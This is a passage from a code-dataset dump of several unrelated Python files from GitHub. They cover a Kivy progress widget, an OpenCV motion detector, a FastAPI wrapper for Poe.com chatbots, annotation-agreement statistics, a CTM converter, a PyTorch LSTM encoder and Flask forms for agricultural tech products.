self.refresh_text()\n self.draw()\n\n def draw(self):\n\n with self.canvas:\n \n # Empty canvas instructions\n self.canvas.clear()\n\n # Draw no-progress circle\n Color(0.26, 0.26, 0.26)\n Ellipse(pos=self.pos, size=self.size)\n\n # Draw progress circle, small hack if there is no progress (angle_end = 0 results in full progress)\n Color(1, 0, 0)\n Ellipse(pos=self.pos, size=self.size,\n angle_end=(0.001 if self.value_normalized == 0 else self.value_normalized*360))\n\n # Draw the inner circle (colour should be equal to the background)\n Color(0, 0, 0)\n Ellipse(pos=(self.pos[0] + self.thickness / 2, self.pos[1] + self.thickness / 2),\n size=(self.size[0] - self.thickness, self.size[1] - self.thickness))\n\n # Center and draw the progress text\n Color(1, 1, 1, 1)\n #added pos[0]and pos[1] for centralizing label text whenever pos_hint is set\n Rectangle(texture=self.label.texture, size=self.texture_size,\n pos=(self.size[0] / 2 - self.texture_size[0] / 2 + self.pos[0], self.size[1] / 2 - self.texture_size[1] / 2 + self.pos[1]))\n\n\n def refresh_text(self):\n # Render the label\n self.label.refresh()\n\n # Set the texture size each 
refresh\n self.texture_size = list(self.label.texture.size)\n\n def set_value(self, value, title, unit):\n # Update the progress bar value\n self.value = value\n\n # Update textual value and refresh the texture\n lText = ''\n if title != '':\n lText = \"%s\\n\"%title\n lText+= str(value)\n if unit != '':\n lText+= unit \n self.label.text = lText\n self.refresh_text()\n\n # Draw all the elements\n self.draw()\n\n \nclass Widget_circularProgress(WidgetHelper):\n \n def __init__(self, **kwargs):\n \n \n self.updateCount = 0\n \n self.screen = 0\n self.size = [200,200]\n self.pos = [0,0]\n self.scale = 1.0\n self.rotation = 0.0\n self.x = 0\n self.y = 0\n \n self.myValue = None\n self.stat = {\n 'skip': 0,\n 'update': 0\n }\n self.subPix = 1.25\n \n self.mtitle = \"\"\n self.mcallback = None\n self.mvalk = \"\"\n self.munit = 1\n self.mround = 1\n self.maxnum = 4\n self.valueToDisplay = 0.0\n \n \n self.smSettings = {\n 'title': '',\n 'min': -175,\n 'max': 175,\n 'unit': '',\n 'round': 1\n }\n\n self.sm = CircularProgressBar()\n self.sm.size_hint = [None,None]\n self.sm.width = self.size[0]\n self.sm.height = self.size[1]\n self.sm.size = self.size\n self.sm.max = self.smSettings['max']\n self.sm.min = self.smSettings['min']\n self.sm.set_value(0.0,'','')\n \n \n self.wvfh = WidgetValFunctionHandler()\n #self.wvfh.setParameters()\n \n def setValues(self, \n screen, title, unit, round_ ,maxnum ):\n self.screen = screen\n self.mtitle = title\n self.munit = unit\n self.mround = round_\n self.maxnum = maxnum\n \n def settingsDoneStore(self):\n pass\n \n def settingsNeedIt(self):\n return True\n \n def setValuesFromDic(self,dic):\n print(\"Widget_circularProgress.setValuesFromDic\",dic)\n self.ImOnScreen = str(dic['screen'])\n self.smSettings['title'] = dic['title']\n self.smSettings['min'] = int(dic['min'])\n self.smSettings['max'] = int(dic['max'])\n self.smSettings['unit'] = dic['unit']\n self.smSettings['round'] = int(dic['round'])\n self.wvfh.setParametersFromDict(dic['valHandler'])\n\n self.sm.min = self.smSettings['min']\n self.sm.max = self.smSettings['max']\n \n print(\"so circular progress pos\",self.pos,\" size\",self.size)\n #sys.exit(0)\n \n def getAttrFromDialog(self):\n self.smSettings['title'] = self.ti_title.text\n self.smSettings['min'] = self.ti_min.text\n self.smSettings['max'] = self.ti_max.text\n self.smSettings['unit'] = self.ti_unit.text\n self.smSettings['round'] = self.ti_round.text\n \n return self.smSettings\n \n \n def addSettingsDialogPart(self,bl, inWConf = None):\n \n bl,self.ti_title = self.addDialogRow(bl, \"Title\", \n \"\" if inWConf == None else inWConf['atr']['title'] )\n bl,self.ti_min = self.addDialogRow(bl, \"Min value\", \n -175 if inWConf == None else str(inWConf['atr']['min']) )\n bl,self.ti_max = self.addDialogRow(bl, \"Max value\", \n 175 if inWConf == None else str(inWConf['atr']['max']) )\n bl, self.ti_round = self.addDialogRow(bl, \"Round to\", \n \"1\" if inWConf == None else inWConf['atr']['round'] )\n bl, self.ti_unit = self.addDialogRow(bl, \"Unit\", \n \"%\" if inWConf == None else inWConf['atr']['unit'] )\n \n \n return bl\n \n def getWidget(self):\n '''print(\"getWidget () o \",self.mtitle,\n \"pos:\",int(self.pos[0]),\"x\",int(self.pos[1]),\n \"size:\",int(self.size[0]),\"x\",int(self.size[1]))\n '''\n return self.sm\n \n def updateIt(self, fromWho = '',vals = ''):\n self.update(fromWho, vals)\n self.setPos(self.pos)\n self.setScale(self.scale)\n self.setRot(self.rotation)\n \n def update(self, fromWho, vals):\n if ( self.gui.rl.current[:7] 
!= 'Widgets' or\n             self.ImOnScreen != self.gui.rl.current[7:]\n             ):\n            #print(\"skip\")\n            return 0\n        \n        if 0:\n            print('''\n    \nupdate from widget_circularProgress[{}] \n    from:{} \n    gotvals:{}'''.format(\n    self.mtitle, fromWho, vals\n    ))\n        \n        v = self.wvfh.updateVal(fromWho, vals)\n        if v is not None:\n            self.valueToDisplay = round( v, self.smSettings['round'] ) if self.smSettings['round'] > 0 else int( v ) \n            self.sm.set_value(self.valueToDisplay,self.smSettings['title'],self.smSettings['unit'])\n        \n        \n        \n    def setGui(self, gui):\n        self.gui = gui\n        \n        self.size = [\n            200,\n            200\n        ]\n        self.pos = [self.x,self.y]\n        \n        \n        \n    def getSize(self):\n        return [self.size[0],self.size[1], 0.25, -1.0 ]\n    \n    ","repo_name":"yOyOeK1/ykpilot","sub_path":"Widget_circularProgress.py","file_name":"Widget_circularProgress.py","file_ext":"py","file_size_in_byte":7690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18901297668","text":"\"\"\"\r\nPython 3.9.10 (tags/v3.9.10:f2f3f53, Jan 17 2022, 15:14:21) [MSC v.1929 64 bit (AMD64)] on win32\r\nThis module is responsible for motion detection\r\n\"\"\"\r\n\r\nimport cv2  # Import the OpenCV module\r\nimport time\r\nimport os\r\n\r\n\r\ndef corrector(name_file: str, chk_video_det, xy_coord: list, frame_zoom: int, size_detect: int,\r\n              lab_o_proc, window, frame_shift, play_speed, but_start, but_pause):\r\n    \"\"\"Repairs a file with a damaged timeline and then runs the detector.\r\n    name_file - Name of the file passed in for processing\r\n    chk_video_det - Flag for showing the playback window during the search\r\n    xy_coord - List of coordinates of the search zone\r\n    frame_zoom - Video scaling factor used for display\r\n    size_detect - Size of the object to detect\r\n    lab_o_proc - Reference to the label used to display progress\r\n    window - Reference to the window\r\n    frame_shift - Frame shift used when motion is detected\r\n    play_speed - Number of frames to skip to speed up processing\r\n    but_start - Start button\r\n    but_pause - Pause button\r\n\r\n    \"\"\"\r\n    if os.path.exists(\"ffmpeg.exe\"):\r\n        os.system(f'ffmpeg -i \"{name_file}\" -map 0:v -vcodec copy -bsf:v h264_mp4toannexb -y \"{name_file[:-4]}_source-video.h264\"')\r\n        os.system(f'ffmpeg -fflags +genpts -r 25 -i \"{name_file[:-4]}_source-video.h264\" -vcodec copy -y \"{name_file[:-4]}_recovered.avi\"')\r\n        os.remove(f'{name_file[:-4]}_source-video.h264')\r\n        return detector(f'{name_file[:-4]}_recovered.avi', chk_video_det, xy_coord, frame_zoom, size_detect,\r\n                        lab_o_proc, window, frame_shift, play_speed, but_start, but_pause)\r\n\r\n    else:\r\n        return 'Ffmpeg'\r\n\r\n\r\ndef detector(name_file: str, chk_video_det, xy_coord: list, frame_zoom: int, size_detect: int,\r\n             lab_o_proc, window, frame_shift, play_speed, but_start, but_pause) -> str:\r\n    \"\"\"Searches for motion within the given area of the current file.\r\n    name_file - Name of the file passed in for processing\r\n    chk_video_det - Flag for showing the playback window during the search\r\n    xy_coord - List of coordinates of the search zone\r\n    frame_zoom - Video scaling factor used for display\r\n    size_detect - Size of the object to detect\r\n    lab_o_proc - Reference to the label used to display progress\r\n    window - Reference to the window\r\n    frame_shift - Frame shift used when motion is detected\r\n    play_speed - Number of frames to skip to speed up processing\r\n    but_start - Start button\r\n    but_pause - Pause button\r\n\r\n    \"\"\"\r\n    if but_start['text'] == 'Старт':  # 'Старт' (Start) is the literal GUI button caption\r\n        return \"OK\"\r\n\r\n    
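# each iteration compares a pair of frames; unreadable reads are tolerated only up to a limit before recovery kicks in\r\n    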
none_frame: int = 0  # Counter for checking empty frames\r\n    start_detect = time.time()  # Time when processing of the video file started\r\n\r\n    cap = cv2.VideoCapture(name_file)  # Capture video from the file\r\n    # cap.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc('H', '2', '6', '4'))\r\n    off_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))  # Get the total number of frames\r\n\r\n    frame_width_det = (cap.get(cv2.CAP_PROP_FRAME_WIDTH))  # Get the size of the source video\r\n    frame_height_det = (cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n\r\n    output = cv2.VideoWriter(name_file[:-4] + \"_detect\" + name_file[len(name_file) - 4:],\r\n                             cv2.VideoWriter_fourcc('H', '2', '6', '4'), 20,\r\n                             (int(frame_width_det), int(frame_height_det)))  # Output options: MJPG PIM1 XVID\r\n    if chk_video_det:\r\n        cv2.namedWindow(name_file, 0)  # Define the output window\r\n        _, x_win, y_win = window.geometry().split('+')\r\n        cv2.moveWindow(name_file, int(x_win)+350, int(y_win))\r\n    while True:  # Frames are displayed in a loop\r\n        if but_pause['text'] == 'Продолжить':  # 'Продолжить' (Continue) is the literal GUI button caption\r\n            cap.release()\r\n            output.release()\r\n            cv2.destroyAllWindows()\r\n            return 'Pause'\r\n        if but_start['text'] == 'Старт':\r\n            cap.release()\r\n            output.release()\r\n            cv2.destroyAllWindows()\r\n            break\r\n        ret1, frame1 = cap.read()\r\n        # This shift groups the outlines of a moving object\r\n        for _ in range(frame_shift):\r\n            cap.read()\r\n        ret2, frame2 = cap.read()\r\n        # This shift is used to speed things up\r\n        for _ in range(play_speed):\r\n            cap.read()\r\n        if cap.get(cv2.CAP_PROP_POS_FRAMES) == off_frames:\r\n            break\r\n        if not ret1 * ret2:\r\n            none_frame += 1\r\n            if none_frame > 10:\r\n                print('The allowed number of empty frames has been exceeded. File recovery started.')\r\n                output.release()  # Close the output file\r\n                cv2.destroyAllWindows()\r\n                os.remove(f'{name_file[:-4]}_detect{name_file[len(name_file) - 4:]}')  # Delete it\r\n                return 'Correct'  # Return a flag telling the caller to run the recovery\r\n            continue\r\n\r\n        # frame1=frame1[y1_search:y2_search,x1_search:x2_search]  # Crop the frame to the required size. Might come in handy
\r\n        # frame2=frame2[y1_search:y2_search,x1_search:x2_search]\r\n        # Show progress as a percentage\r\n        lab_o_proc[\"text\"] = str(cap.get(cv2.CAP_PROP_POS_FRAMES) * 100 // off_frames + 1) + \" %\"\r\n        window.update()  # Refresh the window so the progress is drawn\r\n        if ret2:\r\n            if chk_video_det:\r\n                # Method for visualizing the frame array\r\n                frame1 = algorithm_detector_1(frame1, frame2, xy_coord, frame_zoom, size_detect, output)\r\n                cv2.imshow(name_file, frame1)\r\n                cv2.resizeWindow(name_file, int(frame_width_det) // 2,\r\n                                 int(frame_height_det) // 2)  # Set the size of the output window\r\n        else:\r\n            break\r\n        if chk_video_det and cv2.getWindowProperty(name_file, 1) == 1:  # Exit the program when the window is closed\r\n            break\r\n        if cv2.waitKey(2) == 27:  # Exit on ESC\r\n            break\r\n\r\n    cap.release()\r\n    output.release()\r\n    # Check how many frames were saved\r\n    output = cv2.VideoCapture(name_file[:-4] + \"_detect\" + name_file[len(name_file) - 4:])\r\n    frames_output = int(output.get(cv2.CAP_PROP_FRAME_COUNT))\r\n    output.release()\r\n    cv2.destroyAllWindows()\r\n    if frames_output == 0:  # If no frames were saved, delete the file\r\n        os.remove(f'{name_file[:-4]}_detect{name_file[len(name_file) - 4:]}')\r\n    end_detect = time.time()  # Time when processing of the video file finished\r\n    # Print the time spent processing the file\r\n    print(name_file, '->', str(time.strftime(\"%M:%S\", time.localtime(end_detect - start_detect))))\r\n    return 'OK'\r\n\r\n\r\ndef algorithm_detector_1(frame1, frame2, xy_coord: list, frame_zoom: int, size_detect: int, output):\r\n    x1_search = xy_coord[0][0] * frame_zoom\r\n    y1_search = xy_coord[0][1] * frame_zoom\r\n    x2_search = xy_coord[1][0] * frame_zoom\r\n    y2_search = xy_coord[1][1] * frame_zoom\r\n    # Process the video frame pair to detect motion\r\n    diff_frame = cv2.absdiff(frame1, frame2)  # Subtract one frame from the other\r\n    gray_frame = cv2.cvtColor(diff_frame, cv2.COLOR_BGR2GRAY)  # convert the frames to grayscale\r\n    blur_frame = cv2.GaussianBlur(gray_frame, (5, 5), 0)  # filter out spurious contours\r\n    _, thresh_frame = cv2.threshold(blur_frame, 20, 255,\r\n                                    cv2.THRESH_BINARY)  # highlight the object's edge in white: any\r\n    # value greater than 20 becomes white (255)\r\n    dilated_frame = cv2.dilate(thresh_frame, None, iterations=3)  # expand the white area\r\n    '''\r\n    this method is the opposite of erosion(), i.e. eroding the object,\r\n    and it expands the area highlighted in the previous step\r\n    '''
\r\n\r\n    contours, _ = cv2.findContours(dilated_frame, cv2.RETR_EXTERNAL,\r\n                                   cv2.CHAIN_APPROX_SIMPLE)  # cv2.RETR_TREE: finds the array of contour points\r\n    cv2.rectangle(frame1, (x1_search, y1_search), (x2_search, y2_search), (255, 0, 0), 2)  # Search zone\r\n    for contour in contours:\r\n        (x, y, w, h) = cv2.boundingRect(\r\n            contour)\r\n        '''\r\n        converts the array from the previous step into a tuple of four coordinates;\r\n        the contourArea() method, given the contour points (here a tuple),\r\n        computes the area of the captured object at each moment in time, which can be verified\r\n        '''\r\n        if (w * h) < ((x2_search - x1_search) * (y2_search - y1_search) * int(size_detect) // 100):\r\n            continue\r\n        if not (x + w > x1_search and x < x2_search and y + h > y1_search and y < y2_search):\r\n            continue\r\n        output.write(frame2)  # Write the unmodified frame\r\n        cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2)  # Build the rectangle from the tuple points\r\n        # Draw a red dot\r\n        # cv2.circle(frame1, (int(frame_width_det) - 50, int(frame_height_det) - 40), 10, (0, 0, 255),-1)\r\n        # Alternatively, the object's contour could simply be drawn\r\n        # cv2.drawContours(frame1, contours, -1, (0, 255, 0), 2)\r\n    return frame1\r\n","repo_name":"QWERTYpy/MotionDetection","sub_path":"detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":11445,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43449955125","text":"from poe import load_chat_id_map, clear_context, send_message, get_latest_message, set_auth\nimport os\nfrom typing import Annotated\nfrom fastapi import FastAPI, WebSocket, WebSocketDisconnect, Header\nfrom fastapi.responses import HTMLResponse, JSONResponse\nfrom pydantic import BaseModel\n#--------------------------------------------------------------------------\napp = FastAPI(\n    title=\"Free Poe.com API\",\n    description=\"This is an API for Poe.com, a chatbot that uses GPT-3 to chat with you.\",\n    version=\"0.0.1\",\n    redoc_url=\"/docs\",\n    docs_url=None\n)\nbots = ['capybara', 'a2', 'chinchilla']\n\nclass Item(BaseModel):\n    bot: str\n    message: str\n    cookie: str\n    formkey: str\n\n@app.post(\n    \"/chat/{bot}\",\n    response_model=Item,\n    summary=\"Chat\",\n    description=\"This endpoint allows you to chat with the chosen bot on Poe.com. The bot will respond to your message. You can choose between the following bots: Sage (OpenAI): `capybara` , Claude-Instant (Anthropic): `a2` , ChatGPT (OpenAI): `chinchilla`\",\n    responses={\n        200: {\n            \"description\": \"Success\",\n            \"content\": {\n                \"application/json\": {\n                    \"example\": {\n                        \"message\": \"Hello!\",\n                        \"status\": \"success\",\n                        \"chat_id\": \"123456789\"\n                    }\n                }\n            }\n        },\n        400: {\n            \"description\": \"Bad Request\",\n            \"content\": {\n                \"application/json\": {\n                    \"example\": {\n                        \"message\": \"Bad Request\",\n                        \"details\": \"The bot you selected is not available. 
Please choose one of the following bots: capybara, a2, chinchilla\",\n \"status\": \"error\",\n }\n }\n }\n },\n \"422\": {\n \"description\": \"Unprocessable Entity\",\n },\n 500: {\n \"description\": \"Internal Server Error\",\n \"content\": {\n \"application/json\": {\n \"example\": {\n \"message\": \"Internal Server Error\",\n \"status\": \"error\",\n }\n }\n }\n }\n }\n )\n\nasync def chat(bot:str, options: Item):\n \"\"\"\n This is a Python function that allows users to select and chat with a bot from Poe.com.\n \"\"\"\n if bot not in bots:\n return JSONResponse(status_code=400, content={\"message\" : \"Bad Request\", \"details\":\"The bot you selected is not available. Please choose one of the following bots: capybara, a2, chinchilla\", \"status\":\"error\"})\n if options.cookie is None or options.formkey is None:\n return JSONResponse(status_code=400, content={\"message\" : \"Bad Request\", \"details\":\"At least one of the headers is not provided. Please ensure both the formkey and cookie headers are set.\", \"status\":\"error\"})\n try:\n set_auth('Quora-Formkey',options.formkey)\n set_auth('Cookie',options.cookie)\n chat_id = load_chat_id_map(options.bot)\n clear_context(chat_id)\n send_message(options.message,options.bot,chat_id)\n reply = get_latest_message(options.bot)\n return JSONResponse(status_code=200, content={\"message\" : reply, \"status\":\"success\", \"chat_id\":chat_id })\n except Exception as e:\n print(e)\n return JSONResponse(status_code=500, content={\"message\" : \"Internal Server Error\", \"status\":\"error\"})\n\n@app.get(\"/\")\nasync def main():\n\n \"\"\"\n This function sets up a basic endpoint for the Poe.com API that returns a simple HTML response with\n a link to the API documentation.\n :return: The `main` function is returning an HTML response with a title \"Poe.com API\" and a\n paragraph with a link to the API documentation. When the user navigates to the root URL (\"/\"), they\n will see this HTML content.\n \"\"\"\n content = \"\"\"\n \n

    <html>\n        <head>\n            <title>Poe.com API</title>\n        </head>\n        <body>\n            <p>Go to <a href=\"/docs\">/docs</a> to see the API documentation.</p>\n        </body>\n    </html>\n    \"\"\"\n    return HTMLResponse(content=content)\n","repo_name":"aspekts/PoeAPI","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"27449762585","text":"# %%\nimport krippendorff\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import cohen_kappa_score\n\nagreement = pd.read_parquet(\"../../data/annotation_agreement_all_its.parquet.gzip\")\n# %%\nagreement[\"implicit_layer_enc\"] = agreement[\"implicit_layer\"].replace({\"Implicit HS\": 1, \"Explicit HS\": 0})\nagreement[\"subtlety_layer_enc\"] = agreement[\"subtlety_layer\"].replace({\"Subtle\": 1, \"Non-Subtle\": 0})\n# %%\nnof_its = agreement[\"iteration\"].nunique()\n\nits = []\nimp_cohen_kappas = []\nsubt_cohen_kappas = []\nkrips = []\n\nfor i in range(nof_its):\n    coder_1 = agreement[(agreement[\"iteration\"] == i)\n                        & (agreement[\"coder\"] == 1)]\n    coder_2 = agreement[(agreement[\"iteration\"] == i)\n                        & (agreement[\"coder\"] == 2)]\n\n    y1_imp = coder_1[\"implicit_layer_enc\"]\n    y2_imp = coder_2[\"implicit_layer_enc\"]\n\n    y1_subt = coder_1[\"subtlety_layer_enc\"]\n    y2_subt = coder_2[\"subtlety_layer_enc\"]\n\n    its.append(i)\n    imp_cohen_kappas.append(cohen_kappa_score(y1_imp, y2_imp))\n    subt_cohen_kappas.append(cohen_kappa_score(y1_subt, y2_subt))\n\n    reliability_data = np.vstack([y1_subt + 2 * y1_imp, y2_subt + 2 * y2_imp])\n\n    krips.append(\n        krippendorff.alpha(reliability_data=reliability_data,\n                           level_of_measurement=\"ordinal\"))\n\nagreement_scores = pd.DataFrame({\n    \"it\": its,\n    \"imp_cohen_kappa\": imp_cohen_kappas,\n    \"subt_cohen_kappa\": subt_cohen_kappas,\n    \"krip\": krips\n})\n# %%\nagreement_scores\n# %%\n","repo_name":"benjaminocampo/ISHate","sub_path":"experiments/data_statistics/annotation_agreement.py","file_name":"annotation_agreement.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"} +{"seq_id":"11164852201","text":"# Convert ctm to dictionary for quick access during transcript creation\nfrom collections import defaultdict\nimport json, sys, os\nimport logging\nlogging.basicConfig(format='[%(levelname)s] %(message)s', level=logging.INFO)\n\ndef ctm_to_dict(input_ctm, output_dict):\n    \n    f = open(input_ctm, 'r')\n    lines = f.read().split(\"\\n\")\n    f.close()\n    ctm = defaultdict(list)\n    count = 1\n    for line in lines:\n        if not line:\n            continue\n        # one CTM line: videoname channel start duration word\n        linesplit = line.split()\n        videoname = linesplit[0]\n        start = float(linesplit[2])\n        duration = float(linesplit[3])\n        word = linesplit[4]\n        count += 1\n        ctm[videoname].append((start, duration, word))\n    logging.info(count)\n    logging.info(\"Done\")\n    with open(output_dict, 'w') as outfile:\n        json.dump(dict(ctm), outfile, indent=4)\n    \nif __name__ == '__main__':\n    # the output JSON path is taken as the second CLI argument\n    ctm_to_dict(input_ctm=sys.argv[1], output_dict=sys.argv[2])","repo_name":"AlanSavio25/AVSR-Dataset-Pipeline","sub_path":"utils/ctm_to_dict.py","file_name":"ctm_to_dict.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"72"} +{"seq_id":"32882117966","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom .base_model import BaseModel\n\n\nclass RnnEncoderModel(BaseModel):\n    def __init__(\n        self,\n        device_id,\n        vocab_size,\n        pad_token_id,\n        unk_token_id,\n        go_token_id,\n        
eos_token_id,\n embedding_size,\n dropout,\n num_layers,\n hidden_size,\n ):\n super(RnnEncoderModel, self).__init__(\n device_id=device_id,\n vocab_size=vocab_size,\n pad_token_id=pad_token_id,\n unk_token_id=unk_token_id,\n go_token_id=go_token_id,\n eos_token_id=eos_token_id,\n embedding_size=embedding_size,\n )\n self.dropout = dropout\n self.num_layers = num_layers\n self.hidden_size = hidden_size\n\n self.initial_encoder_state = torch.zeros(\n self.num_layers,\n 1,\n self.hidden_size,\n requires_grad=False,\n )\n self.encoder = nn.LSTM(\n input_size=self.embedding_size,\n hidden_size=self.hidden_size,\n num_layers=self.num_layers,\n dropout=self.dropout if self.num_layers > 1 else 0,\n bias=True,\n )\n\n if self.device_id is not None:\n self.cuda(self.device_id)\n self.initial_encoder_state = self.to_device(\n self.initial_encoder_state\n )\n\n def get_parameters(self):\n parameters = super(RnnEncoderModel, self).get_parameters()\n parameters.update({\n 'dropout': self.dropout,\n 'num_layers': self.num_layers,\n 'hidden_size': self.hidden_size,\n })\n return parameters\n\n def encode(self, input_source):\n emb_input_source = F.dropout(\n self.embeddings(input_source),\n p=self.dropout,\n training=self.training,\n )\n batch_size = input_source.size(1)\n if self.initial_encoder_state.size(1) != batch_size:\n self.initial_encoder_state.resize_(\n self.initial_encoder_state.size(0),\n batch_size,\n self.initial_encoder_state.size(2),\n ).fill_(0)\n\n _, final_encoder_state = self.encoder(\n emb_input_source,\n (self.initial_encoder_state, self.initial_encoder_state),\n )\n return final_encoder_state\n","repo_name":"urikz/ChatBot","sub_path":"ShaLab/models/rnn_encoder_model.py","file_name":"rnn_encoder_model.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"7499514776","text":"from flask_wtf import FlaskForm\nfrom flask_wtf.file import FileField, FileAllowed, FileRequired\nfrom wtforms import StringField, TextField, TextAreaField, SubmitField, SelectField, widgets, SelectMultipleField, PasswordField, BooleanField\nfrom wtforms.ext.sqlalchemy.fields import QuerySelectField, QuerySelectMultipleField\nfrom wtforms.validators import ValidationError, DataRequired, Email, EqualTo, Length, Optional\nfrom wtforms.widgets.core import html_params\nfrom markupsafe import Markup\nfrom .models import HWProducts, SWProducts, Crops, Companies, MagickalInterventions, User, History, Locations, HWCategories, SWCategories\nimport pycountry\n\nclass CountrySelectField(SelectField):\n def __init__(self, *args, **kwargs):\n super(CountrySelectField, self).__init__(*args, **kwargs)\n self.choices = [(country.name, country.name) for country in pycountry.countries]\n\nclass MultiCheckboxField(SelectMultipleField):\n widget = widgets.ListWidget(prefix_label=False)\n option_widget = widgets.CheckboxInput() \n\nclass CustomSelect:\n \"\"\"\n Renders a select field allowing custom attributes for options.\n Expects the field to be an iterable object of Option fields.\n The render function accepts a dictionary of option ids (\"{field_id}-{option_index}\")\n which contain a dictionary of attributes to be passed to the option.\n\n Example:\n form.customselect(option_attr={\"customselect-0\": {\"disabled\": \"\"} })\n \"\"\"\n\n def __init__(self, multiple=False):\n self.multiple = multiple\n\n def __call__(self, field, option_attr=None, **kwargs):\n if option_attr is None:\n option_attr = {}\n 
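# apply the same defaults WTForms' stock Select widget would set before rendering\n        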
kwargs.setdefault(\"id\", field.id)\n        if self.multiple:\n            kwargs[\"multiple\"] = True\n        if \"required\" not in kwargs and \"required\" in getattr(field, \"flags\", []):\n            kwargs[\"required\"] = True\n        html = [\"<select %s>\" % html_params(name=field.name, **kwargs)]\n        for option in field:\n            attr = option_attr.get(option.id, {})\n            html.append(option(**attr))\n        html.append(\"</select>\")\n        return Markup(\"\".join(html))\n\nclass HWProductForm(FlaskForm):\n    # sw_choices = []\n    # for softwares in SWProducts.query.all():\n    #     sw_choices.append((softwares.sw_company_name, softwares.sw_company_name))\n\n    \"\"\"Company Product Form.\"\"\"\n    hw_company_name = StringField(\n        'Company Name',\n        [DataRequired()]\n    )\n    hw_company_product = StringField(\n        'Company Product',\n        [DataRequired()]\n    )\n    hw_hardware_components = StringField(\n        'Hardware Components (please separate by comma)',\n        [DataRequired()]\n    )\n    # hw_categories = SelectField(\n    #     'Category', \n    #     choices=[\n    #         ('robot seeders and planters','robot seeders and planters'), \n    #         ('precision technology','precision technology'),\n    #         ('cybernetic greenhouses','cybernetic greenhouses'),\n    #         ('irrigation','irrigation'),\n    #         ('pesticide and fertilizer robots','pesticide and fertilizer robots'),\n    #         ('sensors','sensors'),\n    #         ('herd management', 'herd management'),\n    #         ('robot harvesters','robot harvesters'),\n    #         ('other','other')\n    #     ],\n    #     validators=[DataRequired()] \n    # )\n\n    hw_categories = QuerySelectMultipleField(\n        'Categories', \n        query_factory=lambda: HWCategories.query.order_by(HWCategories.id).all(),\n        get_label='hw_categories_name',\n        option_widget=widgets.CheckboxInput(), \n        widget=widgets.ListWidget(prefix_label=False), \n        allow_blank=True\n    )\n\n    hw_product_description = TextAreaField(\n        'Product Description',\n        [DataRequired()]\n    )\n    hw_product_img = FileField(\n        'Product Image',\n        [DataRequired()]\n        # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n    )\n    hw_references = StringField(\n        'References (links - please separate by comma)',\n        [DataRequired()]\n    )\n\n    sw_id = QuerySelectMultipleField(\n        'Software used', \n        query_factory=lambda: SWProducts.query.order_by(SWProducts.id).all(),\n        get_label='sw_company_product',\n        option_widget=widgets.CheckboxInput(), \n        widget=widgets.ListWidget(prefix_label=False), \n        allow_blank=True\n    )\n\n    companies_list = QuerySelectMultipleField(\n        'Associated Companies', \n        query_factory=lambda: Companies.query.order_by(Companies.id).all(),\n        get_label='company_name',\n        option_widget=widgets.CheckboxInput(), \n        widget=widgets.ListWidget(prefix_label=False), \n        allow_blank=True\n    )\n    \n    hw_locations_desc = CountrySelectField(\n        'Locations (please separate by comma)',\n        [DataRequired()]\n    )\n    hw_locations_img = FileField(\n        'Location image',\n        [DataRequired()]\n        # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n    )\n    crops_id = QuerySelectMultipleField(\n        'Related Crops', \n        query_factory=lambda: Crops.query.order_by(Crops.id).all(),\n        get_label='crop_name',\n        option_widget=widgets.CheckboxInput(), \n        widget=widgets.ListWidget(prefix_label=False), \n        allow_blank=True\n    )\n    # spells_id = StringField(\n    #     'Spells (select one)'\n    # )\n\n    # recaptcha = RecaptchaField()\n    submit = SubmitField('Submit')\n\n    # field = FieldType(\n    #     'LABEL',\n    #     validators=[ExampleValidator(message=\"ERROR MESSAGE\")],\n    # )\n\n# class MultiCheckboxField(SelectMultipleField):\n#     widget = widgets.ListWidget(prefix_label=False)\n#     option_widget = widgets.CheckboxInput()\n\nclass SWProductForm(FlaskForm):\n    string_of_files = [\n        'genomics', 'mapping', 'identification', 'analytics', 'statistics', 'NDVI', 'imagery', 'testing', 'marketing', 'supplychain', 'irrigation', 
'other'\n ]\n \n files = [(x, x) for x in string_of_files]\n\n \"\"\"Software Product Form.\"\"\"\n sw_company_name = StringField(\n 'Company Name',\n [DataRequired()]\n )\n sw_company_product = StringField(\n 'Company Product',\n [DataRequired()]\n )\n sw_software_components = StringField(\n 'Software Elements (please separate by comma)',\n [DataRequired()]\n )\n sw_categories = MultiCheckboxField(\n 'Category', \n choices=files\n )\n sw_product_description = TextAreaField(\n 'Product Description',\n [DataRequired()]\n )\n sw_product_img = FileField(\n 'Product Image',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n sw_os_license = StringField(\n 'Add Open Source License if applicable',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n sw_references = StringField(\n 'References (links - please separate by comma)',\n [DataRequired()]\n )\n\n sw_locations_desc = CountrySelectField(\n 'Locations (please separate by comma)',\n [DataRequired()]\n )\n sw_locations_img = FileField(\n 'Location image',\n [DataRequired()]\n # validators=[FileRequired(), FileAllowed(images, 'Images only!')]\n )\n crops_id = QuerySelectMultipleField(\n 'Related Crops', \n query_factory=lambda: Crops.query.order_by(Crops.id).all(),\n get_label='crop_name',\n option_widget=widgets.CheckboxInput(), \n widget=widgets.ListWidget(prefix_label=False), \n allow_blank=True\n )\n hw_id = QuerySelectMultipleField(\n 'Related Hardware', \n query_factory=lambda: HWProducts.query.order_by(HWProducts.id).all(),\n get_label='hw_company_product',\n option_widget=widgets.CheckboxInput(), \n 